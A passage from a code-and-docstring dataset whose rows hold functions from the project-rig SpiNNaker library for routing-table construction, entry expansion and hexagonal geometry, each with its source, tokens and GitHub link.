net_keys : {net: (key, mask), ...}
The key and mask associated with each net.
Returns
-------
{(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...] | [
"Convert",
"a",
"set",
"of",
":",
"py",
":",
"class",
":",
"~rig",
".",
"place_and_route",
".",
"routing_tree",
".",
"RoutingTree",
"s",
"into",
"a",
"per",
"-",
"chip",
"set",
"of",
"routing",
"tables",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/utils.py#L8-L83 |
project-rig/rig | rig/routing_table/utils.py | build_routing_table_target_lengths | def build_routing_table_target_lengths(system_info):
"""Build a dictionary of target routing table lengths from a
:py:class:`~rig.machine_control.machine_controller.SystemInfo` object.
Useful in conjunction with :py:func:`~rig.routing_table.minimise_tables`.
Returns
-------
{(x, y): num, ...}
A dictionary giving the number of free routing table entries on each
chip on a SpiNNaker system.
.. note::
The actual number of entries reported is the size of the largest
contiguous free block of routing entries in the routing table.
"""
return {
(x, y): ci.largest_free_rtr_mc_block
for (x, y), ci in iteritems(system_info)
} | python | def build_routing_table_target_lengths(system_info):
"""Build a dictionary of target routing table lengths from a
:py:class:`~rig.machine_control.machine_controller.SystemInfo` object.
Useful in conjunction with :py:func:`~rig.routing_table.minimise_tables`.
Returns
-------
{(x, y): num, ...}
A dictionary giving the number of free routing table entries on each
chip on a SpiNNaker system.
.. note::
The actual number of entries reported is the size of the largest
contiguous free block of routing entries in the routing table.
"""
return {
(x, y): ci.largest_free_rtr_mc_block
for (x, y), ci in iteritems(system_info)
} | [
"def",
"build_routing_table_target_lengths",
"(",
"system_info",
")",
":",
"return",
"{",
"(",
"x",
",",
"y",
")",
":",
"ci",
".",
"largest_free_rtr_mc_block",
"for",
"(",
"x",
",",
"y",
")",
",",
"ci",
"in",
"iteritems",
"(",
"system_info",
")",
"}"
] | Build a dictionary of target routing table lengths from a
:py:class:`~rig.machine_control.machine_controller.SystemInfo` object.
Useful in conjunction with :py:func:`~rig.routing_table.minimise_tables`.
Returns
-------
{(x, y): num, ...}
A dictionary giving the number of free routing table entries on each
chip on a SpiNNaker system.
.. note::
The actual number of entries reported is the size of the largest
contiguous free block of routing entries in the routing table. | [
"Build",
"a",
"dictionary",
"of",
"target",
"routing",
"table",
"lengths",
"from",
"a",
":",
"py",
":",
"class",
":",
"~rig",
".",
"machine_control",
".",
"machine_controller",
".",
"SystemInfo",
"object",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/utils.py#L86-L105 |
project-rig/rig | rig/routing_table/utils.py | table_is_subset_of | def table_is_subset_of(entries_a, entries_b):
"""Check that every key matched by every entry in one table results in the
same route when checked against the other table.
For example, the table::
>>> from rig.routing_table import Routes
>>> table = [
... RoutingTableEntry({Routes.north, Routes.north_east}, 0x0, 0xf),
... RoutingTableEntry({Routes.east}, 0x1, 0xf),
... RoutingTableEntry({Routes.south_west}, 0x5, 0xf),
... RoutingTableEntry({Routes.north, Routes.north_east}, 0x8, 0xf),
... RoutingTableEntry({Routes.east}, 0x9, 0xf),
... RoutingTableEntry({Routes.south_west}, 0xe, 0xf),
... RoutingTableEntry({Routes.north, Routes.north_east}, 0xc, 0xf),
... RoutingTableEntry({Routes.south, Routes.south_west}, 0x0, 0xb),
... ]
is a functional subset of a minimised version of itself::
>>> from rig.routing_table.ordered_covering import minimise
>>> other_table = minimise(table, target_length=None)
>>> other_table == table
False
>>> table_is_subset_of(table, other_table)
True
But not vice-versa::
>>> table_is_subset_of(other_table, table)
False
Default routes are taken into account, such that the table::
>>> table = [
... RoutingTableEntry({Routes.north}, 0x0, 0xf, {Routes.south}),
... ]
is a subset of the empty table::
>>> table_is_subset_of(table, list())
True
Parameters
----------
entries_a : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
entries_b : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Ordered of lists of routing table entries to compare.
Returns
-------
bool
True if every key matched in `entries_a` would result in an equivalent
route for the packet when matched in `entries_b`.
"""
# Determine which bits we don't need to explicitly test for
common_xs = get_common_xs(entries_b)
# For every entry in the first table
for entry in expand_entries(entries_a, ignore_xs=common_xs):
# Look at every entry in the second table
for other_entry in entries_b:
# If the first entry matches the second
if other_entry.mask & entry.key == other_entry.key:
if other_entry.route == entry.route:
# If the route is the same then we move on to the next
# entry in the first table.
break
else:
# Otherwise we return false as the tables are different
return False
else:
# If we didn't break out of the loop then the entry from the first
# table never matched an entry in the second table. If the entry
# from the first table could not be default routed we return False
# as the tables cannot be equivalent.
default_routed = False
if len(entry.route) == 1 and len(entry.sources) == 1:
source = next(iter(entry.sources))
sink = next(iter(entry.route))
if (source is not None and
sink.is_link and
source is sink.opposite):
default_routed = True
if not default_routed:
return False
return True | python | def table_is_subset_of(entries_a, entries_b):
"""Check that every key matched by every entry in one table results in the
same route when checked against the other table.
For example, the table::
>>> from rig.routing_table import Routes
>>> table = [
... RoutingTableEntry({Routes.north, Routes.north_east}, 0x0, 0xf),
... RoutingTableEntry({Routes.east}, 0x1, 0xf),
... RoutingTableEntry({Routes.south_west}, 0x5, 0xf),
... RoutingTableEntry({Routes.north, Routes.north_east}, 0x8, 0xf),
... RoutingTableEntry({Routes.east}, 0x9, 0xf),
... RoutingTableEntry({Routes.south_west}, 0xe, 0xf),
... RoutingTableEntry({Routes.north, Routes.north_east}, 0xc, 0xf),
... RoutingTableEntry({Routes.south, Routes.south_west}, 0x0, 0xb),
... ]
is a functional subset of a minimised version of itself::
>>> from rig.routing_table.ordered_covering import minimise
>>> other_table = minimise(table, target_length=None)
>>> other_table == table
False
>>> table_is_subset_of(table, other_table)
True
But not vice-versa::
>>> table_is_subset_of(other_table, table)
False
Default routes are taken into account, such that the table::
>>> table = [
... RoutingTableEntry({Routes.north}, 0x0, 0xf, {Routes.south}),
... ]
is a subset of the empty table::
>>> table_is_subset_of(table, list())
True
Parameters
----------
entries_a : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
entries_b : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Ordered of lists of routing table entries to compare.
Returns
-------
bool
True if every key matched in `entries_a` would result in an equivalent
route for the packet when matched in `entries_b`.
"""
# Determine which bits we don't need to explicitly test for
common_xs = get_common_xs(entries_b)
# For every entry in the first table
for entry in expand_entries(entries_a, ignore_xs=common_xs):
# Look at every entry in the second table
for other_entry in entries_b:
# If the first entry matches the second
if other_entry.mask & entry.key == other_entry.key:
if other_entry.route == entry.route:
# If the route is the same then we move on to the next
# entry in the first table.
break
else:
# Otherwise we return false as the tables are different
return False
else:
# If we didn't break out of the loop then the entry from the first
# table never matched an entry in the second table. If the entry
# from the first table could not be default routed we return False
# as the tables cannot be equivalent.
default_routed = False
if len(entry.route) == 1 and len(entry.sources) == 1:
source = next(iter(entry.sources))
sink = next(iter(entry.route))
if (source is not None and
sink.is_link and
source is sink.opposite):
default_routed = True
if not default_routed:
return False
return True | [
"def",
"table_is_subset_of",
"(",
"entries_a",
",",
"entries_b",
")",
":",
"# Determine which bits we don't need to explicitly test for",
"common_xs",
"=",
"get_common_xs",
"(",
"entries_b",
")",
"# For every entry in the first table",
"for",
"entry",
"in",
"expand_entries",
"(",
"entries_a",
",",
"ignore_xs",
"=",
"common_xs",
")",
":",
"# Look at every entry in the second table",
"for",
"other_entry",
"in",
"entries_b",
":",
"# If the first entry matches the second",
"if",
"other_entry",
".",
"mask",
"&",
"entry",
".",
"key",
"==",
"other_entry",
".",
"key",
":",
"if",
"other_entry",
".",
"route",
"==",
"entry",
".",
"route",
":",
"# If the route is the same then we move on to the next",
"# entry in the first table.",
"break",
"else",
":",
"# Otherwise we return false as the tables are different",
"return",
"False",
"else",
":",
"# If we didn't break out of the loop then the entry from the first",
"# table never matched an entry in the second table. If the entry",
"# from the first table could not be default routed we return False",
"# as the tables cannot be equivalent.",
"default_routed",
"=",
"False",
"if",
"len",
"(",
"entry",
".",
"route",
")",
"==",
"1",
"and",
"len",
"(",
"entry",
".",
"sources",
")",
"==",
"1",
":",
"source",
"=",
"next",
"(",
"iter",
"(",
"entry",
".",
"sources",
")",
")",
"sink",
"=",
"next",
"(",
"iter",
"(",
"entry",
".",
"route",
")",
")",
"if",
"(",
"source",
"is",
"not",
"None",
"and",
"sink",
".",
"is_link",
"and",
"source",
"is",
"sink",
".",
"opposite",
")",
":",
"default_routed",
"=",
"True",
"if",
"not",
"default_routed",
":",
"return",
"False",
"return",
"True"
] | Check that every key matched by every entry in one table results in the
same route when checked against the other table.
For example, the table::
>>> from rig.routing_table import Routes
>>> table = [
... RoutingTableEntry({Routes.north, Routes.north_east}, 0x0, 0xf),
... RoutingTableEntry({Routes.east}, 0x1, 0xf),
... RoutingTableEntry({Routes.south_west}, 0x5, 0xf),
... RoutingTableEntry({Routes.north, Routes.north_east}, 0x8, 0xf),
... RoutingTableEntry({Routes.east}, 0x9, 0xf),
... RoutingTableEntry({Routes.south_west}, 0xe, 0xf),
... RoutingTableEntry({Routes.north, Routes.north_east}, 0xc, 0xf),
... RoutingTableEntry({Routes.south, Routes.south_west}, 0x0, 0xb),
... ]
is a functional subset of a minimised version of itself::
>>> from rig.routing_table.ordered_covering import minimise
>>> other_table = minimise(table, target_length=None)
>>> other_table == table
False
>>> table_is_subset_of(table, other_table)
True
But not vice-versa::
>>> table_is_subset_of(other_table, table)
False
Default routes are taken into account, such that the table::
>>> table = [
... RoutingTableEntry({Routes.north}, 0x0, 0xf, {Routes.south}),
... ]
is a subset of the empty table::
>>> table_is_subset_of(table, list())
True
Parameters
----------
entries_a : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
entries_b : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Ordered of lists of routing table entries to compare.
Returns
-------
bool
True if every key matched in `entries_a` would result in an equivalent
route for the packet when matched in `entries_b`. | [
"Check",
"that",
"every",
"key",
"matched",
"by",
"every",
"entry",
"in",
"one",
"table",
"results",
"in",
"the",
"same",
"route",
"when",
"checked",
"against",
"the",
"other",
"table",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/utils.py#L108-L198 |
project-rig/rig | rig/routing_table/utils.py | expand_entry | def expand_entry(entry, ignore_xs=0x0):
"""Turn all Xs which are not marked in `ignore_xs` into ``0``\ s and
``1``\ s.
The following will expand any Xs in bits ``1..3``\ ::
>>> entry = RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1100)
>>> list(expand_entry(entry, 0xfffffff1)) == [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1110), # 010X
... RoutingTableEntry(set(), 0b0110, 0xfffffff0 | 0b1110), # 011X
... ]
True
Parameters
----------
entry : :py:class:`~rig.routing_table.RoutingTableEntry` or similar
The entry to expand.
ignore_xs : int
Bit-mask of Xs which should not be expanded.
Yields
------
:py:class:`~rig.routing_table.RoutingTableEntry`
Routing table entries which represent the original entry but with all
Xs not masked off by `ignore_xs` replaced with 1s and 0s.
"""
# Get all the Xs in the entry that are not ignored
xs = (~entry.key & ~entry.mask) & ~ignore_xs
# Find the most significant X
for bit in (1 << i for i in range(31, -1, -1)):
if bit & xs:
# Yield all the entries with this bit set as 0
entry_0 = RoutingTableEntry(entry.route, entry.key,
entry.mask | bit, entry.sources)
for new_entry in expand_entry(entry_0, ignore_xs):
yield new_entry
# And yield all the entries with this bit set as 1
entry_1 = RoutingTableEntry(entry.route, entry.key | bit,
entry.mask | bit, entry.sources)
for new_entry in expand_entry(entry_1, ignore_xs):
yield new_entry
# Stop looking for Xs
break
else:
# If there are no Xs then yield the entry we were given.
yield entry | python | def expand_entry(entry, ignore_xs=0x0):
"""Turn all Xs which are not marked in `ignore_xs` into ``0``\ s and
``1``\ s.
The following will expand any Xs in bits ``1..3``\ ::
>>> entry = RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1100)
>>> list(expand_entry(entry, 0xfffffff1)) == [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1110), # 010X
... RoutingTableEntry(set(), 0b0110, 0xfffffff0 | 0b1110), # 011X
... ]
True
Parameters
----------
entry : :py:class:`~rig.routing_table.RoutingTableEntry` or similar
The entry to expand.
ignore_xs : int
Bit-mask of Xs which should not be expanded.
Yields
------
:py:class:`~rig.routing_table.RoutingTableEntry`
Routing table entries which represent the original entry but with all
Xs not masked off by `ignore_xs` replaced with 1s and 0s.
"""
# Get all the Xs in the entry that are not ignored
xs = (~entry.key & ~entry.mask) & ~ignore_xs
# Find the most significant X
for bit in (1 << i for i in range(31, -1, -1)):
if bit & xs:
# Yield all the entries with this bit set as 0
entry_0 = RoutingTableEntry(entry.route, entry.key,
entry.mask | bit, entry.sources)
for new_entry in expand_entry(entry_0, ignore_xs):
yield new_entry
# And yield all the entries with this bit set as 1
entry_1 = RoutingTableEntry(entry.route, entry.key | bit,
entry.mask | bit, entry.sources)
for new_entry in expand_entry(entry_1, ignore_xs):
yield new_entry
# Stop looking for Xs
break
else:
# If there are no Xs then yield the entry we were given.
yield entry | [
"def",
"expand_entry",
"(",
"entry",
",",
"ignore_xs",
"=",
"0x0",
")",
":",
"# Get all the Xs in the entry that are not ignored",
"xs",
"=",
"(",
"~",
"entry",
".",
"key",
"&",
"~",
"entry",
".",
"mask",
")",
"&",
"~",
"ignore_xs",
"# Find the most significant X",
"for",
"bit",
"in",
"(",
"1",
"<<",
"i",
"for",
"i",
"in",
"range",
"(",
"31",
",",
"-",
"1",
",",
"-",
"1",
")",
")",
":",
"if",
"bit",
"&",
"xs",
":",
"# Yield all the entries with this bit set as 0",
"entry_0",
"=",
"RoutingTableEntry",
"(",
"entry",
".",
"route",
",",
"entry",
".",
"key",
",",
"entry",
".",
"mask",
"|",
"bit",
",",
"entry",
".",
"sources",
")",
"for",
"new_entry",
"in",
"expand_entry",
"(",
"entry_0",
",",
"ignore_xs",
")",
":",
"yield",
"new_entry",
"# And yield all the entries with this bit set as 1",
"entry_1",
"=",
"RoutingTableEntry",
"(",
"entry",
".",
"route",
",",
"entry",
".",
"key",
"|",
"bit",
",",
"entry",
".",
"mask",
"|",
"bit",
",",
"entry",
".",
"sources",
")",
"for",
"new_entry",
"in",
"expand_entry",
"(",
"entry_1",
",",
"ignore_xs",
")",
":",
"yield",
"new_entry",
"# Stop looking for Xs",
"break",
"else",
":",
"# If there are no Xs then yield the entry we were given.",
"yield",
"entry"
] | Turn all Xs which are not marked in `ignore_xs` into ``0``\ s and
``1``\ s.
The following will expand any Xs in bits ``1..3``\ ::
>>> entry = RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1100)
>>> list(expand_entry(entry, 0xfffffff1)) == [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1110), # 010X
... RoutingTableEntry(set(), 0b0110, 0xfffffff0 | 0b1110), # 011X
... ]
True
Parameters
----------
entry : :py:class:`~rig.routing_table.RoutingTableEntry` or similar
The entry to expand.
ignore_xs : int
Bit-mask of Xs which should not be expanded.
Yields
------
:py:class:`~rig.routing_table.RoutingTableEntry`
Routing table entries which represent the original entry but with all
Xs not masked off by `ignore_xs` replaced with 1s and 0s. | [
"Turn",
"all",
"Xs",
"which",
"are",
"not",
"marked",
"in",
"ignore_xs",
"into",
"0",
"\\",
"s",
"and",
"1",
"\\",
"s",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/utils.py#L234-L282 |
project-rig/rig | rig/routing_table/utils.py | expand_entries | def expand_entries(entries, ignore_xs=None):
"""Turn all Xs which are not ignored in all entries into ``0`` s and
``1`` s.
For example::
>>> from rig.routing_table import RoutingTableEntry
>>> entries = [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1100), # 01XX
... RoutingTableEntry(set(), 0b0010, 0xfffffff0 | 0b0010), # XX1X
... ]
>>> list(expand_entries(entries)) == [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1110), # 010X
... RoutingTableEntry(set(), 0b0110, 0xfffffff0 | 0b1110), # 011X
... RoutingTableEntry(set(), 0b0010, 0xfffffff0 | 0b1110), # 001X
... RoutingTableEntry(set(), 0b1010, 0xfffffff0 | 0b1110), # 101X
... RoutingTableEntry(set(), 0b1110, 0xfffffff0 | 0b1110), # 111X
... ]
True
Note that the ``X`` in the LSB was retained because it is common to all
entries.
Any duplicated entries will be removed (in this case the first and second
entries will both match ``0000``, so when the second entry is expanded only
one entry is retained)::
>>> from rig.routing_table import Routes
>>> entries = [
... RoutingTableEntry({Routes.north}, 0b0000, 0b1111), # 0000 -> N
... RoutingTableEntry({Routes.south}, 0b0000, 0b1011), # 0X00 -> S
... ]
>>> list(expand_entries(entries)) == [
... RoutingTableEntry({Routes.north}, 0b0000, 0b1111), # 0000 -> N
... RoutingTableEntry({Routes.south}, 0b0100, 0b1111), # 0100 -> S
... ]
True
.. warning::
It is assumed that the input routing table is orthogonal (i.e., there
are no two entries which would match the same key). If this is not the
case, any entries which are covered (i.e. unreachable) in the input
table will be omitted and a warning produced. As a result, all output
routing tables are guaranteed to be orthogonal.
Parameters
----------
entries : [:py:class:`~rig.routing_table.RoutingTableEntry`...] or similar
The entries to expand.
Other Parameters
----------------
ignore_xs : int
Mask of bits in which Xs should not be expanded. If None (the default)
then Xs which are common to all entries will not be expanded.
Yields
------
:py:class:`~rig.routing_table.RoutingTableEntry`
Routing table entries which represent the original entries but with all
Xs not masked off by `ignore_xs` replaced with 1s and 0s.
"""
# Find the common Xs for the entries
if ignore_xs is None:
ignore_xs = get_common_xs(entries)
# Keep a track of keys that we've seen
seen_keys = set({})
# Expand each entry in turn
for entry in entries:
for new_entry in expand_entry(entry, ignore_xs):
if new_entry.key in seen_keys:
# We've already used this key, warn that the table is
# over-complete.
warnings.warn("Table is not orthogonal: Key {:#010x} matches "
"multiple entries.".format(new_entry.key))
else:
# Mark the key as seen and yield the new entry
seen_keys.add(new_entry.key)
yield new_entry | python | def expand_entries(entries, ignore_xs=None):
"""Turn all Xs which are not ignored in all entries into ``0`` s and
``1`` s.
For example::
>>> from rig.routing_table import RoutingTableEntry
>>> entries = [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1100), # 01XX
... RoutingTableEntry(set(), 0b0010, 0xfffffff0 | 0b0010), # XX1X
... ]
>>> list(expand_entries(entries)) == [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1110), # 010X
... RoutingTableEntry(set(), 0b0110, 0xfffffff0 | 0b1110), # 011X
... RoutingTableEntry(set(), 0b0010, 0xfffffff0 | 0b1110), # 001X
... RoutingTableEntry(set(), 0b1010, 0xfffffff0 | 0b1110), # 101X
... RoutingTableEntry(set(), 0b1110, 0xfffffff0 | 0b1110), # 111X
... ]
True
Note that the ``X`` in the LSB was retained because it is common to all
entries.
Any duplicated entries will be removed (in this case the first and second
entries will both match ``0000``, so when the second entry is expanded only
one entry is retained)::
>>> from rig.routing_table import Routes
>>> entries = [
... RoutingTableEntry({Routes.north}, 0b0000, 0b1111), # 0000 -> N
... RoutingTableEntry({Routes.south}, 0b0000, 0b1011), # 0X00 -> S
... ]
>>> list(expand_entries(entries)) == [
... RoutingTableEntry({Routes.north}, 0b0000, 0b1111), # 0000 -> N
... RoutingTableEntry({Routes.south}, 0b0100, 0b1111), # 0100 -> S
... ]
True
.. warning::
It is assumed that the input routing table is orthogonal (i.e., there
are no two entries which would match the same key). If this is not the
case, any entries which are covered (i.e. unreachable) in the input
table will be omitted and a warning produced. As a result, all output
routing tables are guaranteed to be orthogonal.
Parameters
----------
entries : [:py:class:`~rig.routing_table.RoutingTableEntry`...] or similar
The entries to expand.
Other Parameters
----------------
ignore_xs : int
Mask of bits in which Xs should not be expanded. If None (the default)
then Xs which are common to all entries will not be expanded.
Yields
------
:py:class:`~rig.routing_table.RoutingTableEntry`
Routing table entries which represent the original entries but with all
Xs not masked off by `ignore_xs` replaced with 1s and 0s.
"""
# Find the common Xs for the entries
if ignore_xs is None:
ignore_xs = get_common_xs(entries)
# Keep a track of keys that we've seen
seen_keys = set({})
# Expand each entry in turn
for entry in entries:
for new_entry in expand_entry(entry, ignore_xs):
if new_entry.key in seen_keys:
# We've already used this key, warn that the table is
# over-complete.
warnings.warn("Table is not orthogonal: Key {:#010x} matches "
"multiple entries.".format(new_entry.key))
else:
# Mark the key as seen and yield the new entry
seen_keys.add(new_entry.key)
yield new_entry | [
"def",
"expand_entries",
"(",
"entries",
",",
"ignore_xs",
"=",
"None",
")",
":",
"# Find the common Xs for the entries",
"if",
"ignore_xs",
"is",
"None",
":",
"ignore_xs",
"=",
"get_common_xs",
"(",
"entries",
")",
"# Keep a track of keys that we've seen",
"seen_keys",
"=",
"set",
"(",
"{",
"}",
")",
"# Expand each entry in turn",
"for",
"entry",
"in",
"entries",
":",
"for",
"new_entry",
"in",
"expand_entry",
"(",
"entry",
",",
"ignore_xs",
")",
":",
"if",
"new_entry",
".",
"key",
"in",
"seen_keys",
":",
"# We've already used this key, warn that the table is",
"# over-complete.",
"warnings",
".",
"warn",
"(",
"\"Table is not orthogonal: Key {:#010x} matches \"",
"\"multiple entries.\"",
".",
"format",
"(",
"new_entry",
".",
"key",
")",
")",
"else",
":",
"# Mark the key as seen and yield the new entry",
"seen_keys",
".",
"add",
"(",
"new_entry",
".",
"key",
")",
"yield",
"new_entry"
] | Turn all Xs which are not ignored in all entries into ``0`` s and
``1`` s.
For example::
>>> from rig.routing_table import RoutingTableEntry
>>> entries = [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1100), # 01XX
... RoutingTableEntry(set(), 0b0010, 0xfffffff0 | 0b0010), # XX1X
... ]
>>> list(expand_entries(entries)) == [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1110), # 010X
... RoutingTableEntry(set(), 0b0110, 0xfffffff0 | 0b1110), # 011X
... RoutingTableEntry(set(), 0b0010, 0xfffffff0 | 0b1110), # 001X
... RoutingTableEntry(set(), 0b1010, 0xfffffff0 | 0b1110), # 101X
... RoutingTableEntry(set(), 0b1110, 0xfffffff0 | 0b1110), # 111X
... ]
True
Note that the ``X`` in the LSB was retained because it is common to all
entries.
Any duplicated entries will be removed (in this case the first and second
entries will both match ``0000``, so when the second entry is expanded only
one entry is retained)::
>>> from rig.routing_table import Routes
>>> entries = [
... RoutingTableEntry({Routes.north}, 0b0000, 0b1111), # 0000 -> N
... RoutingTableEntry({Routes.south}, 0b0000, 0b1011), # 0X00 -> S
... ]
>>> list(expand_entries(entries)) == [
... RoutingTableEntry({Routes.north}, 0b0000, 0b1111), # 0000 -> N
... RoutingTableEntry({Routes.south}, 0b0100, 0b1111), # 0100 -> S
... ]
True
.. warning::
It is assumed that the input routing table is orthogonal (i.e., there
are no two entries which would match the same key). If this is not the
case, any entries which are covered (i.e. unreachable) in the input
table will be omitted and a warning produced. As a result, all output
routing tables are guaranteed to be orthogonal.
Parameters
----------
entries : [:py:class:`~rig.routing_table.RoutingTableEntry`...] or similar
The entries to expand.
Other Parameters
----------------
ignore_xs : int
Mask of bits in which Xs should not be expanded. If None (the default)
then Xs which are common to all entries will not be expanded.
Yields
------
:py:class:`~rig.routing_table.RoutingTableEntry`
Routing table entries which represent the original entries but with all
Xs not masked off by `ignore_xs` replaced with 1s and 0s. | [
"Turn",
"all",
"Xs",
"which",
"are",
"not",
"ignored",
"in",
"all",
"entries",
"into",
"0",
"s",
"and",
"1",
"s",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/utils.py#L285-L366 |
project-rig/rig | rig/routing_table/utils.py | get_common_xs | def get_common_xs(entries):
"""Return a mask of where there are Xs in all routing table entries.
For example ``01XX`` and ``XX1X`` have common Xs in the LSB only, for this
input this method would return ``0b0001``::
>>> from rig.routing_table import RoutingTableEntry
>>> entries = [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1100), # 01XX
... RoutingTableEntry(set(), 0b0010, 0xfffffff0 | 0b0010), # XX1X
... ]
>>> print("{:#06b}".format(get_common_xs(entries)))
0b0001
"""
# Determine where there are never 1s in the key and mask
key = 0x00000000
mask = 0x00000000
for entry in entries:
key |= entry.key
mask |= entry.mask
# Where there are never 1s in the key or the mask there are Xs which are
# common to all entries.
return (~(key | mask)) & 0xffffffff | python | def get_common_xs(entries):
"""Return a mask of where there are Xs in all routing table entries.
For example ``01XX`` and ``XX1X`` have common Xs in the LSB only, for this
input this method would return ``0b0001``::
>>> from rig.routing_table import RoutingTableEntry
>>> entries = [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1100), # 01XX
... RoutingTableEntry(set(), 0b0010, 0xfffffff0 | 0b0010), # XX1X
... ]
>>> print("{:#06b}".format(get_common_xs(entries)))
0b0001
"""
# Determine where there are never 1s in the key and mask
key = 0x00000000
mask = 0x00000000
for entry in entries:
key |= entry.key
mask |= entry.mask
# Where there are never 1s in the key or the mask there are Xs which are
# common to all entries.
return (~(key | mask)) & 0xffffffff | [
"def",
"get_common_xs",
"(",
"entries",
")",
":",
"# Determine where there are never 1s in the key and mask",
"key",
"=",
"0x00000000",
"mask",
"=",
"0x00000000",
"for",
"entry",
"in",
"entries",
":",
"key",
"|=",
"entry",
".",
"key",
"mask",
"|=",
"entry",
".",
"mask",
"# Where there are never 1s in the key or the mask there are Xs which are",
"# common to all entries.",
"return",
"(",
"~",
"(",
"key",
"|",
"mask",
")",
")",
"&",
"0xffffffff"
] | Return a mask of where there are Xs in all routing table entries.
For example ``01XX`` and ``XX1X`` have common Xs in the LSB only, for this
input this method would return ``0b0001``::
>>> from rig.routing_table import RoutingTableEntry
>>> entries = [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1100), # 01XX
... RoutingTableEntry(set(), 0b0010, 0xfffffff0 | 0b0010), # XX1X
... ]
>>> print("{:#06b}".format(get_common_xs(entries)))
0b0001 | [
"Return",
"a",
"mask",
"of",
"where",
"there",
"are",
"Xs",
"in",
"all",
"routing",
"table",
"entries",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/utils.py#L369-L393 |
project-rig/rig | rig/place_and_route/allocate/utils.py | slices_overlap | def slices_overlap(slice_a, slice_b):
"""Test if the ranges covered by a pair of slices overlap."""
assert slice_a.step is None
assert slice_b.step is None
return max(slice_a.start, slice_b.start) \
< min(slice_a.stop, slice_b.stop) | python | def slices_overlap(slice_a, slice_b):
"""Test if the ranges covered by a pair of slices overlap."""
assert slice_a.step is None
assert slice_b.step is None
return max(slice_a.start, slice_b.start) \
< min(slice_a.stop, slice_b.stop) | [
"def",
"slices_overlap",
"(",
"slice_a",
",",
"slice_b",
")",
":",
"assert",
"slice_a",
".",
"step",
"is",
"None",
"assert",
"slice_b",
".",
"step",
"is",
"None",
"return",
"max",
"(",
"slice_a",
".",
"start",
",",
"slice_b",
".",
"start",
")",
"<",
"min",
"(",
"slice_a",
".",
"stop",
",",
"slice_b",
".",
"stop",
")"
] | Test if the ranges covered by a pair of slices overlap. | [
"Test",
"if",
"the",
"ranges",
"covered",
"by",
"a",
"pair",
"of",
"slices",
"overlap",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/place_and_route/allocate/utils.py#L4-L10 |
project-rig/rig | rig/geometry.py | minimise_xyz | def minimise_xyz(xyz):
"""Minimise an (x, y, z) coordinate."""
x, y, z = xyz
m = max(min(x, y), min(max(x, y), z))
return (x-m, y-m, z-m) | python | def minimise_xyz(xyz):
"""Minimise an (x, y, z) coordinate."""
x, y, z = xyz
m = max(min(x, y), min(max(x, y), z))
return (x-m, y-m, z-m) | [
"def",
"minimise_xyz",
"(",
"xyz",
")",
":",
"x",
",",
"y",
",",
"z",
"=",
"xyz",
"m",
"=",
"max",
"(",
"min",
"(",
"x",
",",
"y",
")",
",",
"min",
"(",
"max",
"(",
"x",
",",
"y",
")",
",",
"z",
")",
")",
"return",
"(",
"x",
"-",
"m",
",",
"y",
"-",
"m",
",",
"z",
"-",
"m",
")"
] | Minimise an (x, y, z) coordinate. | [
"Minimise",
"an",
"(",
"x",
"y",
"z",
")",
"coordinate",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/geometry.py#L19-L23 |
project-rig/rig | rig/geometry.py | concentric_hexagons | def concentric_hexagons(radius, start=(0, 0)):
"""A generator which produces coordinates of concentric rings of hexagons.
Parameters
----------
radius : int
Number of layers to produce (0 is just one hexagon)
start : (x, y)
The coordinate of the central hexagon.
"""
x, y = start
yield (x, y)
for r in range(1, radius + 1):
# Move to the next layer
y -= 1
# Walk around the hexagon of this radius
for dx, dy in [(1, 1), (0, 1), (-1, 0), (-1, -1), (0, -1), (1, 0)]:
for _ in range(r):
yield (x, y)
x += dx
y += dy | python | def concentric_hexagons(radius, start=(0, 0)):
"""A generator which produces coordinates of concentric rings of hexagons.
Parameters
----------
radius : int
Number of layers to produce (0 is just one hexagon)
start : (x, y)
The coordinate of the central hexagon.
"""
x, y = start
yield (x, y)
for r in range(1, radius + 1):
# Move to the next layer
y -= 1
# Walk around the hexagon of this radius
for dx, dy in [(1, 1), (0, 1), (-1, 0), (-1, -1), (0, -1), (1, 0)]:
for _ in range(r):
yield (x, y)
x += dx
y += dy | [
"def",
"concentric_hexagons",
"(",
"radius",
",",
"start",
"=",
"(",
"0",
",",
"0",
")",
")",
":",
"x",
",",
"y",
"=",
"start",
"yield",
"(",
"x",
",",
"y",
")",
"for",
"r",
"in",
"range",
"(",
"1",
",",
"radius",
"+",
"1",
")",
":",
"# Move to the next layer",
"y",
"-=",
"1",
